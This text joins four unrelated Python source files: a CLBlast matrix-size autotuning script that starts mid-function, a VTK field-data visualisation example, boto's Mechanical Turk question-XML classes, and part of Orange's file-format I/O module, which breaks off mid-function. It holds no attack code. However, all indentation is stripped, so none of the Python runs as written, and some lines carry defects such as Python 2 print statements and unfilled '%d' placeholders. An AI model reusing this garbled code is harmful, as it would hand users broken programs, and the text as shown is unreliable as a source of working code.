fail=r.get('fail','')
if fail=='yes': return {'return':10, 'error':'pipeline failed ('+r.get('fail_reason','')+')'}
ready=r.get('ready','')
if ready!='yes': return {'return':11, 'error':'pipeline not ready'}
state=r['state']
tmp_dir=state['tmp_dir']
xcdeps=r.get('dependencies',{})
# Clean pipeline.
if 'ready' in r: del(r['ready'])
if 'fail' in r: del(r['fail'])
if 'return' in r: del(r['return'])
pipeline=copy.deepcopy(r)
print udepl
# For each Clblast lib ***********************************
for lib_uoa in udepl:
print lib_uoa
ii={'action' : 'load',
'module_uoa' : 'env',
'data_uoa' : lib_uoa}
r=ck.access(ii)
if r['return']>0 : return r
lib_name=r['data_name']
#lib_tags=re.match('BVLC Caffe framework \((?P<tags>.*)\)', lib_name)
#lib_tags=r['dict']['tags']
lib_tags=r['dict']['customize']['used_package_uoa'].split('-')
tags=''
skip_tags = ['lib','master', 'universal']
for t in lib_tags:
if t not in skip_tags:
tags+= t + '-'
# Add the extra_tags (if any)
lib_tags=r['dict']['setup']['version']
tags += lib_tags
# For each model in dataset
for model in dataset:
record_repo='local'
record_uoa='explore-matrix-size-'+tags+'-' + model['Model_name']
ck.out('---------------------------------------------------------------------------------------')
ck.out('Experiment - %s:%s' % (record_repo, record_uoa))
cpipeline=copy.deepcopy(pipeline)
ii={
'action':'autotune',
'module_uoa':'pipeline',
'data_uoa':'program',
'choices_order':[
[
'##env#CK_CLBLAST_MSIZE'
],
[
'##env#CK_CLBLAST_NSIZE',
],
[
'##env#CK_CLBLAST_KSIZE'
]
],
'choices_selection':[
{"type":"loop-with-next", "choice":model['matrix']['M'], "default":"256"},
{"type":"loop-with-next", "choice":model['matrix']['N'], "default":"256"},
{"type":"loop-with-next", "choice":model['matrix']['K'], "default":"256"}
],
'features_keys_to_process':['##choices#*'],
'iterations':-1,
'repetitions':3,
'record':'yes',
'record_failed':'yes',
'record_params':{
'search_point_by_features':'yes'
},
'record_repo':record_repo,
'record_uoa':record_uoa,
'tags':['explore-clblast-matrix-size-client', tags, model['Model_name']],
'pipeline': cpipeline,
'out':'con'
}
r=ck.access(ii)
if DEBUG > 0: print("%s %s" %(DEBUG_STR, r))
if r['return']>0: return r
fail=r.get('fail','')
if fail=='yes':
return {'return':10, 'error':'pipeline failed ('+r.get('fail_reason','')+')'}
return {'return':0}
parser = argparse.ArgumentParser(description='Short sample app')
parser.add_argument("--target_os", action="store", dest="tos")
parser.add_argument("--device_id", action="store", dest="did")
parser.add_argument("--file", action="store", dest="fp")
myarg=parser.parse_args()
r=do({}, myarg)
if r['return']>0: ck.err(r)
| |
#!/usr/bin/env python
# This example demonstrates the use of fields and use of
# vtkProgrammableDataObjectSource. It creates fields the hard way (as
# compared to reading a vtk field file), but shows you how to
# interface to your own raw data.
import os
import re
import vtk
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
xAxis = "INTEREST_RATE"
yAxis = "MONTHLY_PAYMENT"
zAxis = "MONTHLY_INCOME"
scalar = "TIME_LATE"
def getNumberFromLine(line):
patn = re.compile('[-+]{0,1}[\d.]+e?[-+\d]*', re.M)
val = patn.findall(line)
ret = []
for i in val:
ret.append(float(i))
return ret
# Parse an ASCII file and manually create a field. Then construct a
# dataset from the field.
dos = vtk.vtkProgrammableDataObjectSource()
# First define the function that will parse the data.
def parseFile():
global VTK_DATA_ROOT, dos
# Use Python to read an ASCII file
file = open(os.path.join(VTK_DATA_ROOT, "Data/financial.txt"), "r")
line = file.readline()
numPts = int(getNumberFromLine(line)[0])
numLines = (numPts - 1)/8
# Get the data object's field data and allocate
# room for 4, fields
fieldData = dos.GetOutput().GetFieldData()
fieldData.AllocateArrays(4)
# read TIME_LATE - dependent variable
# search the file until an array called TIME_LATE is found
while file.readline()[:9] != "TIME_LATE":
pass
# Create the corresponding float array
timeLate = vtk.vtkFloatArray()
timeLate.SetName("TIME_LATE")
# Read the values
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
timeLate.InsertNextValue(val[j])
# Add the array
fieldData.AddArray(timeLate)
# MONTHLY_PAYMENT - independent variable
while file.readline()[:15] != "MONTHLY_PAYMENT":
pass
monthlyPayment = vtk.vtkFloatArray()
monthlyPayment.SetName("MONTHLY_PAYMENT")
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
monthlyPayment.InsertNextValue(val[j])
fieldData.AddArray(monthlyPayment)
# UNPAID_PRINCIPLE - skip
while file.readline()[:16] != "UNPAID_PRINCIPLE":
pass
for i in range(0, numLines):
file.readline()
# LOAN_AMOUNT - skip
while file.readline()[:11] != "LOAN_AMOUNT":
pass
for i in range(0, numLines):
file.readline()
# INTEREST_RATE - independent variable
while file.readline()[:13] != "INTEREST_RATE":
pass
interestRate = vtk.vtkFloatArray()
interestRate.SetName("INTEREST_RATE")
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
interestRate.InsertNextValue(val[j])
fieldData.AddArray(interestRate)
# MONTHLY_INCOME - independent variable
while file.readline()[:14] != "MONTHLY_INCOME":
pass
monthlyIncome = vtk.vtkFloatArray()
monthlyIncome.SetName("MONTHLY_INCOME")
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
monthlyIncome.InsertNextValue(val[j])
fieldData.AddArray(monthlyIncome)
# Arrange to call the parsing function when the programmable data
# source is executed.
dos.SetExecuteMethod(parseFile)
# Create the dataset.
# DataObjectToDataSetFilter can create geometry using fields from
# DataObject's FieldData
do2ds = vtk.vtkDataObjectToDataSetFilter()
do2ds.SetInputConnection(dos.GetOutputPort())
# We are generating polygonal data
do2ds.SetDataSetTypeToPolyData()
do2ds.DefaultNormalizeOn()
# All we need is points. Assign them.
do2ds.SetPointComponent(0, xAxis, 0)
do2ds.SetPointComponent(1, yAxis, 0)
do2ds.SetPointComponent(2, zAxis, 0)
# RearrangeFields is used to move fields between DataObject's
# FieldData, PointData and CellData.
rf = vtk.vtkRearrangeFields()
rf.SetInputConnection(do2ds.GetOutputPort())
# Add an operation to "move TIME_LATE from DataObject's FieldData to
# PointData"
rf.AddOperation("MOVE", scalar, "DATA_OBJECT", "POINT_DATA")
# Force the filter to execute. This is need to force the pipeline
# to execute so that we can find the range of the array TIME_LATE
rf.Update()
# Set max to the second (GetRange returns [min,max]) of the "range of the
# array called scalar in the PointData of the output of rf"
max = rf.GetOutput().GetPointData().GetArray(scalar).GetRange()[1]
# Use an ArrayCalculator to normalize TIME_LATE
calc = vtk.vtkArrayCalculator()
calc.SetInputConnection(rf.GetOutputPort())
# Working on point data
calc.SetAttributeModeToUsePointData()
# Map scalar to s. When setting function, we can use s to
# represent the array scalar (TIME_LATE)
calc.AddScalarVariable("s", scalar, 0)
# Divide scalar by max (applies division to all components of the array)
calc.SetFunction("s / %f"%max)
# The output array will be called resArray
calc.SetResultArrayName("resArray")
# Use AssignAttribute to make resArray the active scalar field
aa = vtk.vtkAssignAttribute()
aa.SetInputConnection(calc.GetOutputPort())
aa.Assign("resArray", "SCALARS", "POINT_DATA")
aa.Update()
# construct pipeline for original population
# GaussianSplatter -> Contour -> Mapper -> Actor
popSplatter = vtk.vtkGaussianSplatter()
popSplatter.SetInputConnection(aa.GetOutputPort())
popSplatter.SetSampleDimensions(50, 50, 50)
popSplatter.SetRadius(0.05)
popSplatter.ScalarWarpingOff()
popSurface = vtk.vtkContourFilter()
popSurface.SetInputConnection(popSplatter.GetOutputPort())
popSurface.SetValue(0, 0.01)
popMapper = vtk.vtkPolyDataMapper()
popMapper.SetInputConnection(popSurface.GetOutputPort())
popMapper.ScalarVisibilityOff()
popActor = vtk.vtkActor()
popActor.SetMapper(popMapper)
popActor.GetProperty().SetOpacity(0.3)
popActor.GetProperty().SetColor(.9, .9, .9)
# This is for decoration only.
def CreateAxes():
global xAxis, yAxis, zAxis, popSplatter
# Create axes.
popSplatter.Update()
bounds = popSplatter.GetOutput().GetBounds()
axes = vtk.vtkAxes()
axes.SetOrigin(bounds[0], bounds[2], bounds[4])
axes.SetScaleFactor(popSplatter.GetOutput().GetLength()/5.0)
axesTubes = vtk.vtkTubeFilter()
axesTubes.SetInputConnection(axes.GetOutputPort())
axesTubes.SetRadius(axes.GetScaleFactor()/25.0)
axesTubes.SetNumberOfSides(6)
axesMapper = vtk.vtkPolyDataMapper()
axesMapper.SetInputConnection(axesTubes.GetOutputPort())
axesActor = vtk.vtkActor()
axesActor.SetMapper(axesMapper)
# Label the axes.
XText = vtk.vtkVectorText()
XText.SetText(xAxis)
XTextMapper = vtk.vtkPolyDataMapper()
XTextMapper.SetInputConnection(XText.GetOutputPort())
XActor = vtk.vtkFollower()
XActor.SetMapper(XTextMapper)
XActor.SetScale(0.02, .02, .02)
XActor.SetPosition(0.35, -0.05, -0.05)
XActor.GetProperty().SetColor(0, 0, 0)
YText = vtk.vtkVectorText()
YText.SetText(yAxis)
YTextMapper = vtk.vtkPolyDataMapper()
YTextMapper.SetInputConnection(YText.GetOutputPort())
YActor = vtk.vtkFollower()
YActor.SetMapper(YTextMapper)
YActor.SetScale(0.02, .02, .02)
YActor.SetPosition(-0.05, 0.35, -0.05)
YActor.GetProperty().SetColor(0, 0, 0)
ZText = vtk.vtkVectorText()
ZText.SetText(zAxis)
ZTextMapper = vtk.vtkPolyDataMapper()
ZTextMapper.SetInputConnection(ZText.GetOutputPort())
ZActor = vtk.vtkFollower()
ZActor.SetMapper(ZTextMapper)
ZActor.SetScale(0.02, .02, .02)
ZActor.SetPosition(-0.05, -0.05, 0.35)
ZActor.GetProperty().SetColor(0, 0, 0)
return axesActor, XActor, YActor, ZActor
axesActor, XActor, YActor, ZActor = CreateAxes()
# Create the render window, renderer, interactor
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetWindowName("vtk - Field Data")
renWin.SetSize(500, 500)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
ren.AddActor(axesActor)
ren.AddActor(XActor)
ren.AddActor(YActor)
ren.AddActor(ZActor)
ren.AddActor(popActor)
ren.SetBackground(1, 1, 1)
# Set the default camera position
camera = vtk.vtkCamera()
camera.SetClippingRange(.274, 13.72)
camera.SetFocalPoint(0.433816, 0.333131, 0.449)
camera.SetPosition(-1.96987, 1.15145, 1.49053)
camera.SetViewUp(0.378927, 0.911821, 0.158107)
ren.SetActiveCamera(camera)
# Assign the camera to the followers.
XActor.SetCamera(camera)
YActor.SetCamera(camera)
ZActor.SetCamera(camera)
iren.Initialize()
renWin.Render()
iren.Start()
| |
# Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class Question(object):
QUESTION_XML_TEMPLATE = """<Question><QuestionIdentifier>%s</QuestionIdentifier>%s<IsRequired>%s</IsRequired>%s%s</Question>"""
DISPLAY_NAME_XML_TEMPLATE = """<DisplayName>%s</DisplayName>"""
def __init__(self, identifier, content, answer_spec, is_required=False, display_name=None): #amount=0.0, currency_code='USD'):
self.identifier = identifier
self.content = content
self.answer_spec = answer_spec
self.is_required = is_required
self.display_name = display_name
def get_as_params(self, label='Question', identifier=None):
if identifier is None:
raise ValueError("identifier (QuestionIdentifier) is required per MTurk spec.")
return { label : self.get_as_xml() }
def get_as_xml(self):
# add the display name if required
display_name_xml = ''
if self.display_name:
display_name_xml = self.DISPLAY_NAME_XML_TEMPLATE %(self.display_name)
ret = Question.QUESTION_XML_TEMPLATE % (self.identifier,
display_name_xml,
str(self.is_required).lower(),
self.content.get_as_xml(),
self.answer_spec.get_as_xml())
return ret
class ExternalQuestion(object):
EXTERNAL_QUESTIONFORM_SCHEMA_LOCATION = "http://mechanicalturk.amazonaws.com/AWSMechanicalTurkDataSchemas/2006-07-14/ExternalQuestion.xsd"
EXTERNAL_QUESTION_XML_TEMPLATE = """<ExternalQuestion xmlns="%s"><ExternalURL>%s</ExternalURL><FrameHeight>%s</FrameHeight></ExternalQuestion>"""
def __init__(self, external_url, frame_height):
self.external_url = external_url
self.frame_height = frame_height
def get_as_params(self, label='ExternalQuestion'):
return { label : self.get_as_xml() }
def get_as_xml(self):
ret = ExternalQuestion.EXTERNAL_QUESTION_XML_TEMPLATE % (ExternalQuestion.EXTERNAL_QUESTIONFORM_SCHEMA_LOCATION,
self.external_url,
self.frame_height)
return ret
class OrderedContent(object):
def __init__(self):
self.items = []
def append(self, field, value):
"Expects field type and value"
self.items.append((field, value))
def get_binary_xml(self, field, value):
return """
<Binary>
<MimeType>
<Type>%s</Type>
<SubType>%s</SubType>
</MimeType>
<DataURL>%s</DataURL>
<AltText>%s</AltText>
</Binary>""" % (value['type'],
value['subtype'],
value['dataurl'],
value['alttext'])
def get_application_xml(self, field, value):
raise NotImplementedError("Application question content is not yet supported.")
def get_as_xml(self):
default_handler = lambda f,v: '<%s>%s</%s>' % (f,v,f)
bulleted_list_handler = lambda _,list: '<List>%s</List>' % ''.join([('<ListItem>%s</ListItem>' % item) for item in list])
formatted_content_handler = lambda _,content: "<FormattedContent><![CDATA[%s]]></FormattedContent>" % content
application_handler = self.get_application_xml
binary_handler = self.get_binary_xml
children = ''
for (field,value) in self.items:
handler = default_handler
if field == 'List':
handler = bulleted_list_handler
elif field == 'Application':
handler = application_handler
elif field == 'Binary':
handler = binary_handler
elif field == 'FormattedContent':
handler = formatted_content_handler
children = children + handler(field, value)
return children
class Overview(object):
OVERVIEW_XML_TEMPLATE = """<Overview>%s</Overview>"""
def __init__(self):
self.ordered_content = OrderedContent()
def append(self, field, value):
self.ordered_content.append(field,value)
def get_as_params(self, label='Overview'):
return { label : self.get_as_xml() }
def get_as_xml(self):
ret = Overview.OVERVIEW_XML_TEMPLATE % (self.ordered_content.get_as_xml())
return ret
class QuestionForm(object):
QUESTIONFORM_SCHEMA_LOCATION = "http://mechanicalturk.amazonaws.com/AWSMechanicalTurkDataSchemas/2005-10-01/QuestionForm.xsd"
QUESTIONFORM_XML_TEMPLATE = """<QuestionForm xmlns="%s">%s</QuestionForm>"""
def __init__(self):
self.items = []
def append(self, item):
"Expects field type and value"
self.items.append(item)
def get_as_xml(self):
xml = ''
for item in self.items:
xml = xml + item.get_as_xml()
return QuestionForm.QUESTIONFORM_XML_TEMPLATE % (QuestionForm.QUESTIONFORM_SCHEMA_LOCATION, xml)
class QuestionContent(object):
QUESTIONCONTENT_XML_TEMPLATE = """<QuestionContent>%s</QuestionContent>"""
def __init__(self):
self.ordered_content = OrderedContent()
def append(self, field, value):
self.ordered_content.append(field,value)
def get_as_xml(self):
ret = QuestionContent.QUESTIONCONTENT_XML_TEMPLATE % (self.ordered_content.get_as_xml())
return ret
class AnswerSpecification(object):
ANSWERSPECIFICATION_XML_TEMPLATE = """<AnswerSpecification>%s</AnswerSpecification>"""
def __init__(self, spec):
self.spec = spec
def get_as_xml(self):
values = () # TODO
return AnswerSpecification.ANSWERSPECIFICATION_XML_TEMPLATE % self.spec.get_as_xml()
class FreeTextAnswer(object):
FREETEXTANSWER_XML_TEMPLATE = """<FreeTextAnswer>%s%s</FreeTextAnswer>""" # (constraints, default)
FREETEXTANSWER_CONSTRAINTS_XML_TEMPLATE = """<Constraints>%s%s%s</Constraints>""" # (is_numeric_xml, length_xml, regex_xml)
FREETEXTANSWER_LENGTH_XML_TEMPLATE = """<Length %s %s />""" # (min_length_attr, max_length_attr)
FREETEXTANSWER_ISNUMERIC_XML_TEMPLATE = """<IsNumeric %s %s />""" # (min_value_attr, max_value_attr)
FREETEXTANSWER_DEFAULTTEXT_XML_TEMPLATE = """<DefaultText>%s</DefaultText>""" # (default)
def __init__(self, default=None, min_length=None, max_length=None, is_numeric=False, min_value=None, max_value=None, format_regex=None):
self.default = default
self.min_length = min_length
self.max_length = max_length
self.is_numeric = is_numeric
self.min_value = min_value
self.max_value = max_value
self.format_regex = format_regex
def get_as_xml(self):
is_numeric_xml = ""
if self.is_numeric:
min_value_attr = ""
max_value_attr = ""
if self.min_value:
min_value_attr = """minValue="%d" """ % self.min_value
if self.max_value:
max_value_attr = """maxValue="%d" """ % self.max_value
is_numeric_xml = FreeTextAnswer.FREETEXTANSWER_ISNUMERIC_XML_TEMPLATE % (min_value_attr, max_value_attr)
length_xml = ""
if self.min_length or self.max_length:
min_length_attr = ""
max_length_attr = ""
if self.min_length:
min_length_attr = """minLength="%d" """
if self.max_length:
max_length_attr = """maxLength="%d" """
length_xml = FreeTextAnswer.FREETEXTANSWER_LENGTH_XML_TEMPLATE % (min_length_attr, max_length_attr)
regex_xml = ""
if self.format_regex:
format_regex_attribs = '''regex="%s"''' %self.format_regex['regex']
error_text = self.format_regex.get('error_text', None)
if error_text:
format_regex_attribs += ' errorText="%s"' %error_text
flags = self.format_regex.get('flags', None)
if flags:
format_regex_attribs += ' flags="%s"' %flags
regex_xml = """<AnswerFormatRegex %s/>""" %format_regex_attribs
constraints_xml = ""
if is_numeric_xml or length_xml or regex_xml:
constraints_xml = FreeTextAnswer.FREETEXTANSWER_CONSTRAINTS_XML_TEMPLATE % (is_numeric_xml, length_xml, regex_xml)
default_xml = ""
if self.default is not None:
default_xml = FreeTextAnswer.FREETEXTANSWER_DEFAULTTEXT_XML_TEMPLATE % self.default
return FreeTextAnswer.FREETEXTANSWER_XML_TEMPLATE % (constraints_xml, default_xml)
class FileUploadAnswer(object):
FILEUPLOADANSWER_XML_TEMLPATE = """<FileUploadAnswer><MinFileSizeInBytes>%d</MinFileSizeInBytes><MaxFileSizeInBytes>%d</MaxFileSizeInBytes></FileUploadAnswer>""" # (min, max)
DEFAULT_MIN_SIZE = 1024 # 1K (completely arbitrary!)
DEFAULT_MAX_SIZE = 5 * 1024 * 1024 # 5MB (completely arbitrary!)
def __init__(self, min=None, max=None):
self.min = min
self.max = max
if self.min is None:
self.min = FileUploadAnswer.DEFAULT_MIN_SIZE
if self.max is None:
self.max = FileUploadAnswer.DEFAULT_MAX_SIZE
def get_as_xml(self):
return FileUploadAnswer.FILEUPLOADANSWER_XML_TEMLPATE % (self.min, self.max)
class SelectionAnswer(object):
"""
A class to generate SelectionAnswer XML data structures.
Does not yet implement Binary selection options.
"""
SELECTIONANSWER_XML_TEMPLATE = """<SelectionAnswer>%s%s<Selections>%s</Selections></SelectionAnswer>""" # % (count_xml, style_xml, selections_xml)
SELECTION_XML_TEMPLATE = """<Selection><SelectionIdentifier>%s</SelectionIdentifier>%s</Selection>""" # (identifier, value_xml)
SELECTION_VALUE_XML_TEMPLATE = """<%s>%s</%s>""" # (type, value, type)
STYLE_XML_TEMPLATE = """<StyleSuggestion>%s</StyleSuggestion>""" # (style)
MIN_SELECTION_COUNT_XML_TEMPLATE = """<MinSelectionCount>%s</MinSelectionCount>""" # count
MAX_SELECTION_COUNT_XML_TEMPLATE = """<MaxSelectionCount>%s</MaxSelectionCount>""" # count
ACCEPTED_STYLES = ['radiobutton', 'dropdown', 'checkbox', 'list', 'combobox', 'multichooser']
OTHER_SELECTION_ELEMENT_NAME = 'OtherSelection'
def __init__(self, min=1, max=1, style=None, selections=None, type='text', other=False):
if style is not None:
if style in SelectionAnswer.ACCEPTED_STYLES:
self.style_suggestion = style
else:
raise ValueError("style '%s' not recognized; should be one of %s" % (style, ', '.join(SelectionAnswer.ACCEPTED_STYLES)))
else:
self.style_suggestion = None
if selections is None:
raise ValueError("SelectionAnswer.__init__(): selections must be a non-empty list of (content, identifier) tuples")
else:
self.selections = selections
self.min_selections = min
self.max_selections = max
assert len(selections) >= self.min_selections, "# of selections is less than minimum of %d" % self.min_selections
#assert len(selections) <= self.max_selections, "# of selections exceeds maximum of %d" % self.max_selections
self.type = type
self.other = other
def get_as_xml(self):
if self.type == 'text':
TYPE_TAG = "Text"
elif self.type == 'binary':
TYPE_TAG = "Binary"
else:
raise ValueError("illegal type: %s; must be either 'text' or 'binary'" % str(self.type))
# build list of <Selection> elements
selections_xml = ""
for tpl in self.selections:
value_xml = SelectionAnswer.SELECTION_VALUE_XML_TEMPLATE % (TYPE_TAG, tpl[0], TYPE_TAG)
selection_xml = SelectionAnswer.SELECTION_XML_TEMPLATE % (tpl[1], value_xml)
selections_xml += selection_xml
if self.other:
# add OtherSelection element as xml if available
if hasattr(self.other, 'get_as_xml'):
assert type(self.other) == FreeTextAnswer, 'OtherSelection can only be a FreeTextAnswer'
selections_xml += self.other.get_as_xml().replace('FreeTextAnswer', 'OtherSelection')
else:
selections_xml += "<OtherSelection />"
if self.style_suggestion is not None:
style_xml = SelectionAnswer.STYLE_XML_TEMPLATE % self.style_suggestion
else:
style_xml = ""
if self.style_suggestion != 'radiobutton':
count_xml = SelectionAnswer.MIN_SELECTION_COUNT_XML_TEMPLATE %self.min_selections
count_xml += SelectionAnswer.MAX_SELECTION_COUNT_XML_TEMPLATE %self.max_selections
else:
count_xml = ""
ret = SelectionAnswer.SELECTIONANSWER_XML_TEMPLATE % (count_xml, style_xml, selections_xml)
# return XML
return ret
| |
import contextlib
import csv
import locale
import pickle
import re
import subprocess
import sys
import warnings
from tempfile import NamedTemporaryFile
from os import path, unlink
from ast import literal_eval
from math import isnan
from numbers import Number
from itertools import chain, repeat
from functools import lru_cache
from collections import OrderedDict
from urllib.parse import urlparse, unquote as urlunquote
from urllib.request import urlopen
import bottleneck as bn
import numpy as np
from chardet.universaldetector import UniversalDetector
from Orange.data import (
_io, is_discrete_values, MISSING_VALUES, Table, Domain, Variable,
DiscreteVariable, StringVariable, ContinuousVariable, TimeVariable,
)
from Orange.util import Registry, flatten, namegen
_IDENTITY = lambda i: i
class Compression:
"""Supported compression extensions"""
GZIP = '.gz'
BZIP2 = '.bz2'
XZ = '.xz'
all = (GZIP, BZIP2, XZ)
def open_compressed(filename, *args, _open=open, **kwargs):
"""Return seamlessly decompressed open file handle for `filename`"""
if isinstance(filename, str):
if filename.endswith(Compression.GZIP):
from gzip import open as _open
elif filename.endswith(Compression.BZIP2):
from bz2 import open as _open
elif filename.endswith(Compression.XZ):
from lzma import open as _open
return _open(filename, *args, **kwargs)
# Else already a file, just pass it through
return filename
def detect_encoding(filename):
"""
Detect encoding of `filename`, which can be a ``str`` filename, a
``file``-like object, or ``bytes``.
"""
# Try with Unix file utility first because it's faster (~10ms vs 100ms)
if isinstance(filename, str) and not filename.endswith(Compression.all):
try:
with subprocess.Popen(('file', '--brief', '--mime-encoding', filename),
stdout=subprocess.PIPE) as process:
process.wait()
if process.returncode == 0:
encoding = process.stdout.read().strip()
# file only supports these encodings; for others it says
# unknown-8bit or binary. So we give chardet a chance to do
# better
if encoding in (b'utf-8', b'us-ascii', b'iso-8859-1',
b'utf-7', b'utf-16le', b'utf-16be', b'ebcdic'):
return encoding.decode('us-ascii')
except OSError: pass # windoze
# file not available or unable to guess the encoding, have chardet do it
detector = UniversalDetector()
# We examine only first N 4kB blocks of file because chardet is really slow
MAX_BYTES = 4*1024*12
def _from_file(f):
detector.feed(f.read(MAX_BYTES))
detector.close()
return detector.result.get('encoding')
if isinstance(filename, str):
with open_compressed(filename, 'rb') as f:
return _from_file(f)
elif isinstance(filename, bytes):
detector.feed(filename[:MAX_BYTES])
detector.close()
return detector.result.get('encoding')
elif hasattr(filename, 'encoding'):
return filename.encoding
else: # assume file-like object that you can iter through
return _from_file(filename)
class Flags:
"""Parser for column flags (i.e. third header row)"""
DELIMITER = ' '
_RE_SPLIT = re.compile(r'(?<!\\)' + DELIMITER).split
_RE_ATTR_UNQUOTED_STR = re.compile(r'^[a-zA-Z_]').match
ALL = OrderedDict((
('class', 'c'),
('ignore', 'i'),
('meta', 'm'),
('weight', 'w'),
('.+?=.*?', ''), # general key=value attributes
))
_RE_ALL = re.compile(r'^({})$'.format('|'.join(filter(None, flatten(ALL.items())))))
def __init__(self, flags):
for v in filter(None, self.ALL.values()):
setattr(self, v, False)
self.attributes = {}
for flag in flags or []:
flag = flag.strip()
if self._RE_ALL.match(flag):
if '=' in flag:
k, v = flag.split('=', 1)
self.attributes[k] = (v if Flags._RE_ATTR_UNQUOTED_STR(v) else
literal_eval(v) if v else
'')
else:
setattr(self, flag, True)
setattr(self, self.ALL.get(flag, ''), True)
elif flag:
warnings.warn('Invalid attribute flag \'{}\''.format(flag))
@staticmethod
def join(iterable, *args):
return Flags.DELIMITER.join(i.strip().replace(Flags.DELIMITER, '\\' + Flags.DELIMITER)
for i in chain(iterable, args)).lstrip()
@staticmethod
def split(s):
return [i.replace('\\' + Flags.DELIMITER, Flags.DELIMITER)
for i in Flags._RE_SPLIT(s)]
# Matches discrete specification where all the values are listed, space-separated
_RE_DISCRETE_LIST = re.compile(r'^\s*[^\s]+(\s[^\s]+)+\s*$')
_RE_TYPES = re.compile(r'^\s*({}|{}|)\s*$'.format(_RE_DISCRETE_LIST.pattern,
'|'.join(flatten(getattr(vartype, 'TYPE_HEADERS')
for vartype in Variable.registry.values()))))
_RE_FLAGS = re.compile(r'^\s*( |{}|)*\s*$'.format('|'.join(flatten(filter(None, i) for i in Flags.ALL.items()))))
class FileFormatMeta(Registry):
def __new__(cls, name, bases, attrs):
newcls = super().__new__(cls, name, bases, attrs)
# Optionally add compressed versions of extensions as supported
if getattr(newcls, 'SUPPORT_COMPRESSED', False):
new_extensions = list(getattr(newcls, 'EXTENSIONS', ()))
for compression in Compression.all:
for ext in newcls.EXTENSIONS:
new_extensions.append(ext + compression)
newcls.EXTENSIONS = tuple(new_extensions)
return newcls
@property
def formats(self):
return self.registry.values()
@lru_cache(5)
def _ext_to_attr_if_attr2(self, attr, attr2):
"""
Return ``{ext: `attr`, ...}`` dict if ``cls`` has `attr2`.
If `attr` is '', return ``{ext: cls, ...}`` instead.
"""
return OrderedDict((ext, getattr(cls, attr, cls))
for cls in self.registry.values()
if hasattr(cls, attr2)
for ext in getattr(cls, 'EXTENSIONS', []))
@property
def names(self):
return self._ext_to_attr_if_attr2('DESCRIPTION', '__class__')
@property
def writers(self):
return self._ext_to_attr_if_attr2('', 'write_file')
@property
def readers(self):
return self._ext_to_attr_if_attr2('', 'read')
@property
def img_writers(self):
return self._ext_to_attr_if_attr2('', 'write_image')
@property
def graph_writers(self):
return self._ext_to_attr_if_attr2('', 'write_graph')
class FileFormat(metaclass=FileFormatMeta):
"""
Subclasses set the following attributes and override the following methods:
EXTENSIONS = ('.ext1', '.ext2', ...)
DESCRIPTION = 'human-readable file format description'
SUPPORT_COMPRESSED = False
def read(self):
... # load headers, data, ...
return self.data_table(data, headers)
@classmethod
def write_file(cls, filename, data):
...
self.write_headers(writer.write, data)
writer.writerows(data)
Wrapper FileFormat.data_table() returns Orange.data.Table from `data`
iterable (list (rows) of lists of values (cols)).
"""
PRIORITY = 10000 # Sort order in OWSave widget combo box, lower is better
def __init__(self, filename):
"""
Parameters
----------
filename : str
name of the file to open
"""
self.filename = filename
self.sheet = None
@property
def sheets(self):
"""FileFormats with a notion of sheets should override this property
to return a list of sheet names in the file.
Returns
-------
a list of sheet names
"""
return ()
def select_sheet(self, sheet):
"""Select sheet to be read
Parameters
----------
sheet : str
sheet name
"""
self.sheet = sheet
@classmethod
def get_reader(cls, filename):
"""Return reader instance that can be used to read the file
Parameters
----------
filename : str
Returns
-------
FileFormat
"""
for ext, reader in cls.readers.items():
if filename.endswith(ext):
return reader(filename)
raise IOError('No readers for file "{}"'.format(filename))
@classmethod
def write(cls, filename, data):
return cls.write_file(filename, data)
@classmethod
def write_table_metadata(cls, filename, data):
if isinstance(filename, str) and getattr(data, 'attributes', {}):
with open(filename + '.metadata', 'wb') as f:
pickle.dump(data.attributes, f, pickle.HIGHEST_PROTOCOL)
@classmethod
def set_table_metadata(cls, filename, table):
if isinstance(filename, str) and path.exists(filename + '.metadata'):
with open(filename + '.metadata', 'rb') as f:
table.attributes = pickle.load(f)
@classmethod
def locate(cls, filename, search_dirs=('.',)):
"""Locate a file with given filename that can be opened by one
of the available readers.
Parameters
----------
filename : str
search_dirs : Iterable[str]
Returns
-------
str
Absolute path to the file
"""
if path.exists(filename):
return filename
for directory in search_dirs:
absolute_filename = path.join(directory, filename)
if path.exists(absolute_filename):
break
for ext in cls.readers:
if filename.endswith(ext):
break
if path.exists(absolute_filename + ext):
absolute_filename += ext
break
if path.exists(absolute_filename):
break
else:
absolute_filename = ""
if not path.exists(absolute_filename):
raise IOError('File "{}" was not found.'.format(filename))
return absolute_filename
@staticmethod
def open(filename, *args, **kwargs):
"""
Format handlers can use this method instead of the builtin ``open()``
to transparently (de)compress files if requested (according to
`filename` extension). Set ``SUPPORT_COMPRESSED=True`` if you use this.
"""
return open_compressed(filename, *args, **kwargs)
@staticmethod
def parse_headers(data):
"""Return (header rows, rest of data) as discerned from `data`"""
def is_number(item):
try: float(item)
except ValueError: return False
return True
# Second row items are type identifiers
def header_test2(items):
return all(map(_RE_TYPES.match, items))
